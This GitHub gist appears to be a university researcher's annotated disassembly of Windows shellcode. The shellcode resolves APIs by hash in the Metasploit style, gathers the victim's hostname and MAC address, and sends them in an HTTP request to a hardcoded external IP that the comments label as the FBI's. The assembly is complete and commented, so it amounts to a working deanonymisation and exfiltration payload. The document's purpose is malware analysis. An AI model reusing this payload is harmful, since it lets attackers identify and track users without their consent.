Created
September 30, 2013 17:07
-
-
Save HILTMARTEN-ANTWARPUS/6766905 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; --------------------------------------------------------------------------- | |
; File Name : C:\Users\gho\Desktop\fbi-sc.bin | |
; Gareth Owen, University of Portsmouth | |
; Load in Notepad++ for syntax highlighting | |
pusha | |
cld ; direction flag clear for string ops | |
call start ; ebp=locate | |
; ebp also used as position independant data pointer ebp[offset] | |
; metasploit function resolver | |
; https://github.com/iagox86/nbtool/blob/master/samples/shellcode-win32/block_api.asm | |
; function hashes: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py | |
; | |
; push onto stack: hash of function name and parameters | |
; runs api call | |
; returns result through eax | |
; | |
LocateProc: ; DATA CROSSREF: 00000092 | |
; 0000009 | |
hashcode = dword ptr -4 | |
pusha | |
mov ebp, esp | |
xor edx, edx | |
mov edx, fs:[edx+30h] ; PEB location | |
mov edx, [edx+0Ch] ; module list / PEB->ldr | |
mov edx, [edx+14h] ; first module | |
next_mod: ; CODE CROSSREF: LocateProc+87 | |
mov esi, [edx+28h] | |
movzx ecx, word ptr [edx+26h] | |
xor edi, edi | |
loop_modname: ; CODE CROSSREF: LocateProc+26 | |
xor eax, eax | |
lodsb | |
cmp al, 61h ; 'a' | |
jl short not_lowercase | |
sub al, 20h ; ' ' | |
not_lowercase: ; CODE CROSSREF: LocateProc+1D | |
ror edi, 0Dh | |
add edi, eax | |
loop loop_modname | |
push edx | |
push edi | |
mov edx, [edx+10h] | |
mov eax, [edx+3Ch] | |
add eax, edx | |
mov eax, [eax+78h] | |
test eax, eax | |
jz short get_next_mod1 | |
add eax, edx | |
push eax | |
mov ecx, [eax+18h] | |
loc_46: | |
mov ebx, [eax+20h] | |
add ebx, edx | |
get_next_func: ; CODE CROSSREF: LocateProc+60 | |
jecxz short get_next_mod | |
dec ecx | |
mov esi, [ebx+ecx*4] | |
add esi, edx | |
xor edi, edi | |
loop_funcname: ; CODE CROSSREF: LocateProc+58 | |
xor eax, eax | |
lodsb | |
ror edi, 0Dh | |
add edi, eax | |
cmp al, ah | |
jnz short loop_funcname | |
add edi, [ebp-8] | |
cmp edi, [ebp+24h] | |
jnz short get_next_func | |
pop eax | |
mov ebx, [eax+24h] | |
add ebx, edx | |
mov cx, [ebx+ecx*2] | |
mov ebx, [eax+1Ch] | |
add ebx, edx | |
mov eax, [ebx+ecx*4] | |
add eax, edx | |
mov [esp+28h+hashcode], eax | |
pop ebx ; stack cleanup before api call | |
pop ebx | |
popa | |
pop ecx | |
pop edx | |
push ecx ; caller's return address | |
jmp eax ; run api call | |
; --------------------------------------------------------------------------- | |
get_next_mod: ; CODE CROSSREF: LocateProc:get_next_func | |
pop eax | |
get_next_mod1: ; CODE CROSSREF: LocateProc+37 | |
pop edi | |
pop edx | |
mov edx, [edx] | |
jmp short next_mod | |
LocateProc endp ; sp-analysis failed | |
; --------------------------------------------------------------------------- | |
connectTryCounter db 5 ; DATA CROSSREF: 00000106 | |
; --------------------------------------------------------------------------- | |
start: ; CODE CROSSREF: 00000002 | |
pop ebp ; ebp=locate | |
; | |
cmp dword ptr [getRequestStr ], ' TEG' ; sanity check - did exploit suceed OK? | |
jnz short error | |
lea eax, [ws2_32_dll] ; "ws2_32" | |
push eax | |
push 726774Ch ; kernel32.dll!LoadLibraryA | |
call ebp | |
test eax, eax | |
jz short error | |
lea eax, [iphlpapi_dll] ; "IPHLPAPI" | |
push eax | |
push 726774Ch ; kernel32.dll!LoadLibraryA | |
call ebp | |
test eax, eax | |
jz short error | |
mov ebx, 190h | |
sub esp, ebx | |
push esp ; buffer for WSA info | |
push ebx ; wVersionRequested = 400 | |
push 6B8029h ; ws2_32.dll!WSAStartup | |
call ebp | |
add esp, ebx ; ditch wsa info - we dont want it | |
test eax, eax ; still check we got an ok result though | |
jnz short error | |
push eax ; no flags | |
push eax ; no group action | |
push eax ; no protocol info | |
push eax ; no protocol specified | |
inc eax ; eax=1 | |
push eax ; SOCK_STREAM | |
inc eax ; eax=2 | |
push eax ; addrfamily=AF_INET | |
push 0E0DF0FEAh ; ws2_32.dll!WSASocketA | |
call ebp | |
xor ebx, ebx | |
not ebx | |
cmp ebx, eax | |
jz short error | |
mov ebx, eax | |
loc_F1: ; CODE CROSSREF: 0000010C | |
push 10h ; length | |
lea esi, [sockAddr] ; sockaddr struct -- FBI IP here | |
push esi ; sockaddr struct | |
push ebx ; socket | |
push 6174A599h ; ws2_32.dll!connect | |
call ebp | |
test eax, eax | |
jz short connected | |
dec [connectTryCounter] | |
jnz short loc_F1 ; retry to connect up to 5 times | |
error: ; CODE CROSSREF: 0000009C | |
; 000000AE | |
cmp [SentToFBIFlag], 1 | |
jz short setupcrash ; did shellcode suceed? | |
call httpHeaderConstruct | |
jmp short jmptocrashcode ; jumps to crash code in middle of data | |
; --------------------------------------------------------------------------- | |
setupcrash: ; CODE CROSSREF: 00000115 | |
call httpRequestLengthCalc | |
jmptocrashcode: ; CODE CROSSREF: 0000011C | |
jmp edi ; jumps to crash code in middle of data | |
; --------------------------------------------------------------------------- | |
connected: ; CODE CROSSREF: 00000104 | |
mov eax, 100h | |
sub esp, eax | |
mov edx, esp | |
push edx | |
push eax ; buffer length=100h | |
push edx ; name buffer | |
push 1DE49B6h ; ws2_32.dll!gethostname | |
call ebp | |
pop edi | |
add esp, 100h | |
test eax, eax ; check result | |
jnz closesocket | |
push edi | |
call quasi_strlen ; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
pop esi | |
mov edx, ecx | |
lea edi, [getRequestStr] ; "GET /05cea4de-951d-4037-bf8f-f69055b279"... | |
call quasi_strlen ; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
dec edi | |
cmp edx, 20h ; ' ' ; sanity check.. | |
jl short loc_166 ; append user's host address to Host field of http header | |
mov edx, 20h ; ' ' | |
loc_166: ; CODE CROSSREF: 0000015F | |
mov ecx, edx ; append user's host address to Host field of http header | |
push esi | |
rep movsb | |
mov ecx, 0Dh | |
lea esi, [cookieStr] ; now append cookie string | |
rep movsb | |
mov [addrtoputmacaddr], edi | |
pop esi | |
push esi ; our local hostname, resolve to ip | |
push 803428A9h ; ws2_32.dll!gethostbyname | |
call ebp | |
test eax, eax ; eax = hostent | |
jz closesocket ; gethostbyname failed! | |
mov cx, [eax+0Ah] | |
cmp cx, 4 ; result sanity check | |
jb closesocket | |
lea eax, [eax+0Ch] | |
mov eax, [eax] | |
mov ecx, [eax] | |
mov ecx, [ecx] ; ip addr | |
mov eax, 100h | |
push eax | |
mov edi, esp | |
sub esp, eax | |
mov esi, esp | |
push edi ; mac addr length | |
push esi ; mac addr destination | |
push ecx ; srcip | |
push ecx ; destip | |
push 0B8D27248h ; iphlpapi.dll!SendARP | |
call ebp ; get PC mac address | |
test eax, eax | |
add esp, 104h | |
movzx ecx, word ptr [edi] | |
cmp ecx, 6 ; check mac addr right length (48bit) | |
jb short closesocket | |
mov ecx, 6 | |
mov eax, 10h | |
sub esp, eax | |
mov edi, esp | |
mov edx, ecx | |
shl edx, 1 | |
push eax | |
push edx | |
macaddrtostring: ; CODE CROSSREF: 0000020B | |
xor edx, edx ; converts binary MAC address to a string | |
; for incorporation into a http request | |
mov dl, [esi] | |
mov al, dl | |
and al, 0F0h ; high nibble | |
shr al, 4 | |
cmp al, 9 | |
ja short loc_1F4 | |
add al, 30h ; '0' | |
jmp short loc_1F6 | |
; --------------------------------------------------------------------------- | |
loc_1F4: ; CODE CROSSREF: 000001EE | |
add al, 37h ; '7' | |
loc_1F6: ; CODE CROSSREF: 000001F2 | |
mov [edi], al | |
inc edi | |
mov al, dl | |
and al, 0Fh ; low nibble | |
cmp al, 9 | |
ja short loc_205 | |
add al, 30h ; '0' | |
jmp short loc_207 | |
; --------------------------------------------------------------------------- | |
loc_205: ; CODE CROSSREF: 000001FF | |
add al, 37h ; '7' | |
loc_207: ; CODE CROSSREF: 00000203 | |
mov [edi], al | |
inc edi | |
inc esi | |
loop macaddrtostring ; converts binary MAC address to a string | |
; for incorporation into a http request | |
pop ecx | |
sub edi, ecx | |
mov esi, edi ; move mac address string to http request | |
pop eax | |
add esp, eax | |
mov edi, [addrtoputmacaddr] | |
rep movsb | |
mov [SentToFBIFlag], 1 | |
call httpHeaderConstruct ; append remainder of header | |
xor eax, eax | |
push eax ; flags | |
push ecx ; length | |
sub edi, ecx ; put buffer pointer back to beginning of buffer | |
dec edi | |
push edi ; buffer | |
push ebx ; socket | |
push 5F38EBC2h ; ws2_32.dll!send | |
call ebp | |
closesocket: ; CODE CROSSREF: 00000141 | |
; 00000189 ... | |
push ebx | |
push 614D6E75h ; ws2_32.dll!closesocket | |
call ebp | |
jmp error | |
; =============== S U B R O U T I N E ======================================= | |
; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
quasi_strlen ; CODE CROSSREF: 00000148 | |
; 00000156 ... | |
xor ecx, ecx | |
not ecx | |
loc_24A: | |
xor eax, eax | |
repne scasb | |
loc_24E: | |
not ecx | |
dec ecx | |
retn | |
quasi_strlen endp | |
; --------------------------------------------------------------------------- | |
addrtoputmacaddr dd 0 ; DATA CROSSREF: 00000178 | |
; 00000215 | |
SentToFBIFlag db 0 ; DATA CROSSREF: error | |
; 0000021D | |
; =============== S U B R O U T I N E ======================================= | |
httpHeaderConstruct ; CODE CROSSREF: 00000117 | |
; 00000224 | |
lea edi, [getRequestStr] ; "GET /05cea4de-951d-4037-bf8f-f69055b279"... | |
call quasi_strlen ; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
dec edi ; remove null pointer | |
mov ecx, 4Fh ; 'O' | |
lea esi, [httpHeaderStr] ; "\r\nConnection: keep-alive\r\nAccept: */*\r\n"... | |
rep movsb ; append httpheaderstr | |
httpRequestLengthCalc: ; CODE CROSSREF: setupcrash | |
lea edi, [getRequestStr] ; "GET /05cea4de-951d-4037-bf8f-f69055b279"... | |
call quasi_strlen ; calculates string length - side effect, finds end string null | |
; | |
; output | |
; edi=end of str | |
; ecx=strlen | |
retn | |
httpHeaderConstruct endp | |
; --------------------------------------------------------------------------- | |
httpHeaderStr db 0Dh,0Ah ; DATA CROSSREF: httpHeaderConstruct+11 | |
db 'Connection: keep-alive',0Dh,0Ah | |
db 'Accept: */*',0Dh,0Ah | |
db 'Accept-Encoding: gzip',0Dh,0Ah | |
db 0Dh,0Ah,0 | |
; --------------------------------------------------------------------------- | |
add edi, 0Eh ; gets copied with the above to end of getrequeststr | |
; it's then jumped to by the crash jmps | |
; searches for non-null characters and runs them | |
xor ecx, ecx | |
not ecx ; scan for nonnull characcter and jmp to it | |
xor eax, eax | |
repe scasb | |
dec edi | |
jmp edi ; prob the nop at 0x3bb | |
; --------------------------------------------------------------------------- | |
cookieStr db 0Dh,0Ah ; DATA CROSSREF: 00000170 | |
db 'Cookie: ID=' | |
ws2_32_dll db 'ws2_32',0 ; DATA CROSSREF: 0000009E | |
iphlpapi_dll db 'IPHLPAPI',0 ; DATA CROSSREF: 000000B0 | |
sockAddr db 2 ; DATA CROSSREF: 000000F3 | |
; sa_family | |
sockaddr_in db 0 ; sin_family | |
db 0 ; port | |
db 50h ; P ; port=80 | |
db 41h ; A ; ip addr = 65.222.202.54 | |
db 0DEh ; Ţ | |
db 0CAh ; Ę | |
db 36h ; 6 | |
getRequestStr db 'GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1',0Dh,0Ah | |
; DATA CROSSREF: 00000092 | |
; 00000150 ... | |
db 'Host: ',0 | |
db 0 ; buffer space for construction of complete http request | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 0 | |
db 90h ; the terminal no-op | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment